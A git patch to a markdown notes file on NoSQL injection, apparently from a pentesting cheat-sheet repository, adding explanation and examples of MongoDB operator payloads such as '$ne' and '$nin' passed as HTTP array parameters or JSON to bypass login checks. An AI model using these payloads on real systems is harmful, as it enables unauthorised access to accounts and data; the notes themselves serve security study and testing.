From b7ee005c6831b455e58837f08f0af3a2bc42edbe Mon Sep 17 00:00:00 2001
From: whx <stefan@stefan.works>
Date: Sun, 13 Nov 2022 23:54:35 +0100
Subject: [PATCH] NoSQL update

---
 Exploits/Databases/NoSQL Injection.md | 23 +++++++++++++++++------
 1 file changed, 17 insertions(+), 6 deletions(-)

diff --git a/Exploits/Databases/NoSQL Injection.md b/Exploits/Databases/NoSQL Injection.md
index b75f00f..105bd09 100644
--- a/Exploits/Databases/NoSQL Injection.md	
+++ b/Exploits/Databases/NoSQL Injection.md	
@@ -9,8 +9,8 @@
 * [MongoDB operators](https://docs.mongodb.com/manual/reference/operator/query/)
 * [Elasticsearch docs](https://www.elastic.co/guide/index.html)
 
-# Operators
-* Most common
+## Operators
+* A precondition to the injection is to know the most common operators listed below
 ```sql
 $and
 $or
@@ -22,16 +22,27 @@ $exists
 $regex
 ```
 
-## Tips & Tricks
+## Injection
 
-* Pass HTTP parameter as an array instead of `user=` and `password=` use `user[$operator]=foo` and `password[$operator]=bar`
-    * 2D array via `user[$nin][]=foo`
+The payload is delivered inside the parameters of the request. To deliver malicious payload the operators can be negated. That means the for example all users except the known one used in the request is included in the response from the database server.
+
+* Pass HTTP parameter as an array instead of `user=` and `password=` use 
+```sh
+user[$operator]=foo&password[$operator]=bar
+```
+
+* Give a 2D array a chance as well while fiddling with the request in following way
+```sh
+user[$nin][]=foo
+```
+
+### Examples
 
-## Example
 * POST or GET parameters
 ```sh
 username=admin&password[$ne]=admin
 ```
+
 * JSON
 ```json
 {"username":"user","password":{"$ne":""} }